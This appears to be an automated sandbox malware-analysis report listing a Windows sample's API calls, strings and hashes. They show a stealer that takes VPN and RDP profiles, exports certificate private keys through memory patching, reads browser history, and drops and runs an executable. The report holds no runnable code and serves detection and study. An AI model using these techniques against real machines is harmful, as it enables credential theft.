• Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
Similarity
• API ID: CreateErrorLast$Pipe$CloseHandleProcess
• String ID:
• API String ID: 2620922840-0

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
• Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
Similarity
• API ID: Cert$NameStore$CertificatesCloseEnumOpenString
• String ID: +ss$+sls$fs{s${s{s
• API String ID: 3617724111-3691527440

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
• Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
Similarity
• API ID: CertEnumStoreSystem
• String ID: ":{$"_":""
• API String ID: 4132996702-2026347918

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
• Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
Similarity
• API ID: CertEnumLocationStoreSystem
• String ID: "_": ""
• API String ID: 863500693-1453221996

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileNamedPeekPipeRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 327342812-0
                                                                                                                                        • Opcode ID: 34d1d673edd9c40d02f270326efd511933567532b5db1aeb081074a9eac190bf
                                                                                                                                        • Instruction ID: 25d817d01092f172318f8bf8594061935ce2610c3b0e31d8ec64ab819dace8d5
                                                                                                                                        • Opcode Fuzzy Hash: 34d1d673edd9c40d02f270326efd511933567532b5db1aeb081074a9eac190bf
                                                                                                                                        • Instruction Fuzzy Hash: 7E01923271868287E7108B52E4857BAB7A1EB96BDCF148234DA58CB794EFFCD4448F10

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CodeExitNamedObjectPeekPipeProcessSingleWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2021502500-0
                                                                                                                                        • Opcode ID: 76b1647610fa3ac8a868448c97318814702deb2e1fa5470dc729882b7589c6ea
                                                                                                                                        • Instruction ID: b747efa84414956934f193ba1e51a97e76100945a9f574ed1965a49e7ba42e5e
                                                                                                                                        • Opcode Fuzzy Hash: 76b1647610fa3ac8a868448c97318814702deb2e1fa5470dc729882b7589c6ea
                                                                                                                                        • Instruction Fuzzy Hash: 34012922A086C282EF508F65D4903B937A5EF85B8CF145631CA2DC65C9EFADDC85CB20

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetProcessHeap.KERNEL32(?,?,?,00007FF6F2D61951,?,?,00000000,00007FF6F2D619BA), ref: 00007FF6F2D62669
                                                                                                                                        • RtlReAllocateHeap.NTDLL(?,?,?,00007FF6F2D61951,?,?,00000000,00007FF6F2D619BA), ref: 00007FF6F2D6267A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1357844191-0
                                                                                                                                        • Opcode ID: be938404752c85019b6f44b0f5e5ed4010620d834be4c87ef3aa5fcdd3d15046
                                                                                                                                        • Instruction ID: d1d0807e15f710fe6865df3db8348367bc455f63fdf50b67302238492d704a08
                                                                                                                                        • Opcode Fuzzy Hash: be938404752c85019b6f44b0f5e5ed4010620d834be4c87ef3aa5fcdd3d15046
                                                                                                                                        • Instruction Fuzzy Hash: A3E08615A085C281EB189BD2B9A40756625AF49BC8F088330DD2E47BD5ED6CD8454F20

                                                                                                                                        Control-flow Graph
                                                                                                                                        control_flow_graph 685 7ff6f2d61a70-7ff6f2d61ab8 call 7ff6f2d61918 wvsprintfW
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wvsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2795597889-0
                                                                                                                                        • Opcode ID: dd0fe6c676249214c66d74395a2174ea02b493f73ae380c8d3cb8aeb877b2744
                                                                                                                                        • Instruction ID: fca94b04056fcabe7986ddb8474854f63d578387de564ba26768f874a12c6d9f
                                                                                                                                        • Opcode Fuzzy Hash: dd0fe6c676249214c66d74395a2174ea02b493f73ae380c8d3cb8aeb877b2744
                                                                                                                                        • Instruction Fuzzy Hash: DEE06DB2A00B45C2D7048F15E98108C7B79FB99FC8B54C125CB4857364DF38D996CB60

                                                                                                                                        Control-flow Graph
                                                                                                                                        control_flow_graph 688 7ff6f2d679c4-7ff6f2d679d9 GetNativeSystemInfo 689 7ff6f2d679db-7ff6f2d679e1 688->689 690 7ff6f2d679e7 688->690 689->690 691 7ff6f2d679e3-7ff6f2d679e5 689->691 692 7ff6f2d679e9-7ff6f2d679ed 690->692 691->692
                                                                                                                                        APIs
                                                                                                                                        • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00007FF6F2D674DE), ref: 00007FF6F2D679CD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoNativeSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1721193555-0
                                                                                                                                        • Opcode ID: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
                                                                                                                                        • Instruction ID: 2d0d28360ff1b498021be3eb41f858d4ada5a0aab9784f3947aa6043cfb0d382
                                                                                                                                        • Opcode Fuzzy Hash: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
                                                                                                                                        • Instruction Fuzzy Hash: 02D05E02C0848682EB316B00945713632A1FF5930CFC00332C1AD824E07FACD7899E26
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Path$ExistsHeap$AppendCreateEnvironmentProcessReadSizeVariable$CombineFreeQuoteSpaceslstrcatlstrlen
                                                                                                                                        • String ID: ", "group": "$", "host": "$"user": "$</DefaultGroup>$</DefaultHostName>$</DefaultUser>$<DefaultGroup>$<DefaultHostName>$<DefaultUser>$Software\Fortinet\FortiClient\Sslvpn\Tunnels$Software\Microsoft\Terminal Server Client\Servers$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles$Software\SonicWall\SSL-VPN NetExtender\Standalone$]},$}},
                                                                                                                                        • API String ID: 2508640211-1951492331
                                                                                                                                        • Opcode ID: 95f97117d68d64b6bf25aee9c45f7644639b940521229bd54e3b0bc6304baee3
                                                                                                                                        • Instruction ID: 6cbca81cbdb4c4a1060cd56d5170f5e19f5ebb1b13a7b73e10fa7896408bad43
                                                                                                                                        • Opcode Fuzzy Hash: 95f97117d68d64b6bf25aee9c45f7644639b940521229bd54e3b0bc6304baee3
                                                                                                                                        • Instruction Fuzzy Hash: 9F12C221A1858245EB10EB61D8953F93765AF867C8F804332E92DC7BDAFFACD505CB20
                                                                                                                                        APIs
                                                                                                                                        • CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D6325E
                                                                                                                                        • CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF6F2D6328D
                                                                                                                                        • CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D632BB
                                                                                                                                          • Part of subcall function 00007FF6F2D636F0: CryptExportKey.ADVAPI32 ref: 00007FF6F2D63744
                                                                                                                                          • Part of subcall function 00007FF6F2D636F0: CryptExportKey.ADVAPI32 ref: 00007FF6F2D6379E
                                                                                                                                        • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D63336
                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D63380
                                                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6F2D633AC
                                                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6F2D633DC
                                                                                                                                        • CryptExportKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6F2D63404
                                                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6F2D6341C
                                                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6F2D6343F
                                                                                                                                        • CryptAcquireContextA.ADVAPI32 ref: 00007FF6F2D63459
                                                                                                                                        • CryptImportKey.ADVAPI32 ref: 00007FF6F2D6347E
                                                                                                                                        • OpenSCManagerA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D634B5
                                                                                                                                        • OpenServiceA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D63505
                                                                                                                                        • QueryServiceStatusEx.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D63523
                                                                                                                                        • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D63532
                                                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D6355D
                                                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F2D62C48), ref: 00007FF6F2D6357C
                                                                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6F2D6359F
                                                                                                                                        • NCryptExportKey.NCRYPT ref: 00007FF6F2D63605
                                                                                                                                        • CertOpenStore.CRYPT32 ref: 00007FF6F2D63667
                                                                                                                                        • CertAddCertificateLinkToStore.CRYPT32 ref: 00007FF6F2D63682
                                                                                                                                        • CertSetCertificateContextProperty.CRYPT32 ref: 00007FF6F2D6369E
                                                                                                                                        • PFXExportCertStoreEx.CRYPT32 ref: 00007FF6F2D636BD
                                                                                                                                        • PFXExportCertStoreEx.CRYPT32 ref: 00007FF6F2D636DF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Crypt$CertExport$CertificateOpenProcessProtectStoreVirtual$ContextMemory$AcquirePropertyReadService$AddressImportLibraryLinkLoadManagerPrivateProcQueryStatusUserWrite
                                                                                                                                        • String ID: -,0z$5)F$CAPIPRIVATEBLOB$Microsoft Software Key Storage Provider$km{l
                                                                                                                                        • API String ID: 2161712720-385819238
APIs
Strings
Similarity
• API ID: Http$CloseHandle$DataHeapOpenOptionQueryRequest$AvailableConnectCrackFreeProcessReadReceiveResponseSend
• String ID: <r;r$?r r$?r r
• API String ID: 199669925-2032818692
APIs
Strings
Similarity
• API ID: File$lstrcat$Close$FindHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFirstFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcpy
• String ID: *.default-release$APPDATA$\places.sqlite
• API String ID: 4154822446-3438982840
APIs
Strings
Similarity
• API ID: Card$CardsFreeListMemory$ChangeStatus
• String ID: "_": ""$%02X
• API String ID: 2879528921-1880646522
APIs
Similarity
• API ID: CryptExport$HeapProcess
• String ID:
• API String ID: 532797600-0
APIs
Similarity
• API ID: File$Heap$Process$CloseHandleViewlstrlen$ByteCharCreateExistsFreeMappingMultiOpenPathSizeUnmapWide__memcpy
• String ID:
• API String ID: 2161876737-0
APIs
Strings
Similarity
• API ID: File$Time$CloseCreateExecuteHandlePathShellSystemTempWritewsprintf
• String ID: %08X.exe$open
• API String ID: 2307396689-1771423410
APIs
Strings
Similarity
• API ID: File$lstrcatlstrlen$CloseHandleHeapView__memcpy$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWide
• String ID: Default$LOCALAPPDATA$\History
• API String ID: 3980575106-3555721359
APIs
Strings
Similarity
• API ID: CreateInitializeInstanceUninitialize
• String ID: http
• API String ID: 948891078-2541227442
APIs
Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Time$FileProcessSystem$CloseCodeExitHandleNamedObjectPeekPipeSingleTerminateWait
                                                                                                                                        • String ID: exit
                                                                                                                                        • API String ID: 1626563136-1626635026
                                                                                                                                        • Opcode ID: e8db0668784a4e42b00b615d6c0ccb33bfa89d96bba3dbda8ec61e812724d3ba
                                                                                                                                        • Instruction ID: f88c66be1f4166232ef29a87bcbb3d9bc70e0528e35b3ef42b43f1636e1d9394
                                                                                                                                        • Opcode Fuzzy Hash: e8db0668784a4e42b00b615d6c0ccb33bfa89d96bba3dbda8ec61e812724d3ba
                                                                                                                                        • Instruction Fuzzy Hash: 76312E31A0864281EF50DF35D4902B93BA1EF95B8CF541332E92EC65D9FEACE845CB60
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create$ArrayFileSafe$DataStringTime$AccessAllocCloseExecuteFreeHandleInitInitializeInstancePathShellSystemTempUnaccessVariantVectorWritewsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1750269033-0
                                                                                                                                        • Opcode ID: 35f14d03cfaf8c97af958c557d0a79d7db1ea00b24c4592062ca6e010514b8e8
                                                                                                                                        • Instruction ID: ab7fcc01f1f293ebbd49ca2ce118f9e05da8bc1e4a2eacdafa0d4aba0a8a13f5
                                                                                                                                        • Opcode Fuzzy Hash: 35f14d03cfaf8c97af958c557d0a79d7db1ea00b24c4592062ca6e010514b8e8
                                                                                                                                        • Instruction Fuzzy Hash: 11613926B08A0696EB00DF65D4943AC37A4FB49B8CF448232CE1D97B98EE7DD509C760
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00007FF6F2D625DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6F2D61985,?,?,?,00007FF6F2D6155F), ref: 00007FF6F2D625E5
                                                                                                                                        • __memcpy.DELAYIMP ref: 00007FF6F2D6F18F
                                                                                                                                          • Part of subcall function 00007FF6F2D70114: __memcpy.DELAYIMP ref: 00007FF6F2D70145
                                                                                                                                          • Part of subcall function 00007FF6F2D70114: __memcpy.DELAYIMP ref: 00007FF6F2D70153
                                                                                                                                          • Part of subcall function 00007FF6F2D6EB94: lstrlenA.KERNEL32 ref: 00007FF6F2D6EBB1
                                                                                                                                          • Part of subcall function 00007FF6F2D625B4: GetProcessHeap.KERNEL32 ref: 00007FF6F2D625C1
                                                                                                                                          • Part of subcall function 00007FF6F2D625B4: RtlFreeHeap.NTDLL ref: 00007FF6F2D625CF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap__memcpy$Process$Freelstrlen
                                                                                                                                        • String ID: last_visit_time$table$url$urls
                                                                                                                                        • API String ID: 2336645791-3896411411
                                                                                                                                        • Opcode ID: 50821f25f0cb2751fab6b95a68dc4b7fcf46b3044d28eb552ffeba5f77d45c67
                                                                                                                                        • Instruction ID: f6ebf14a7c896fbe09eef22c620d048c1911f4872c2a29dcf85c07fba0a7df20
                                                                                                                                        • Opcode Fuzzy Hash: 50821f25f0cb2751fab6b95a68dc4b7fcf46b3044d28eb552ffeba5f77d45c67
                                                                                                                                        • Instruction Fuzzy Hash: 9A319862608B8686DB20DB26E4905A97B50FB86BC8F408231DE6EC77D5FEBCD545CF10
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00007FF6F2D625DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6F2D61985,?,?,?,00007FF6F2D6155F), ref: 00007FF6F2D625E5
                                                                                                                                        • __memcpy.DELAYIMP ref: 00007FF6F2D6EF63
                                                                                                                                          • Part of subcall function 00007FF6F2D70114: __memcpy.DELAYIMP ref: 00007FF6F2D70145
                                                                                                                                          • Part of subcall function 00007FF6F2D70114: __memcpy.DELAYIMP ref: 00007FF6F2D70153
                                                                                                                                          • Part of subcall function 00007FF6F2D6EB94: lstrlenA.KERNEL32 ref: 00007FF6F2D6EBB1
                                                                                                                                          • Part of subcall function 00007FF6F2D625B4: GetProcessHeap.KERNEL32 ref: 00007FF6F2D625C1
                                                                                                                                          • Part of subcall function 00007FF6F2D625B4: RtlFreeHeap.NTDLL ref: 00007FF6F2D625CF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap__memcpy$Process$Freelstrlen
                                                                                                                                        • String ID: last_visit_date$moz_places$table$url
                                                                                                                                        • API String ID: 2336645791-66087218
                                                                                                                                        • Opcode ID: 557a3c6594f34c1c2268f7d356880dc065484ba3f2c21b151f8bf6fb891685af
                                                                                                                                        • Instruction ID: 726d15e15da1afc21c4cf6b2f85e19db96d215b575fdd5027171060912a61d5f
                                                                                                                                        • Opcode Fuzzy Hash: 557a3c6594f34c1c2268f7d356880dc065484ba3f2c21b151f8bf6fb891685af
                                                                                                                                        • Instruction Fuzzy Hash: 6931A922608A8745DB20DB26E4906A97B50FB86BC8F504232DE6EC77D5FEBCD446CB10
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00007FF6F2D625DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6F2D61985,?,?,?,00007FF6F2D6155F), ref: 00007FF6F2D625E5
                                                                                                                                        • __memcpy.DELAYIMP ref: 00007FF6F2D6ED43
                                                                                                                                          • Part of subcall function 00007FF6F2D70114: __memcpy.DELAYIMP ref: 00007FF6F2D70145
                                                                                                                                          • Part of subcall function 00007FF6F2D70114: __memcpy.DELAYIMP ref: 00007FF6F2D70153
                                                                                                                                          • Part of subcall function 00007FF6F2D6EB94: lstrlenA.KERNEL32 ref: 00007FF6F2D6EBB1
                                                                                                                                          • Part of subcall function 00007FF6F2D625B4: GetProcessHeap.KERNEL32 ref: 00007FF6F2D625C1
                                                                                                                                          • Part of subcall function 00007FF6F2D625B4: RtlFreeHeap.NTDLL ref: 00007FF6F2D625CF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.4126008574.00007FF6F2D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6F2D60000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.4125951508.00007FF6F2D60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126066141.00007FF6F2D71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126220569.00007FF6F2D74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.4126273300.00007FF6F2D75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff6f2d60000_B972.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap__memcpy$Process$Freelstrlen
                                                                                                                                        • String ID: last_visit_time$table$url$urls
                                                                                                                                        • API String ID: 2336645791-3896411411
                                                                                                                                        • Opcode ID: 152a2d5ca8424219c1645b7db4641ab7528640e05460c9e3818a3068e443641a
                                                                                                                                        • Instruction ID: 6aa6c2156328ae9b38fbac3ce3c2331c29c179d99ffb45331fdcfcb2f7255aae
                                                                                                                                        • Opcode Fuzzy Hash: 152a2d5ca8424219c1645b7db4641ab7528640e05460c9e3818a3068e443641a
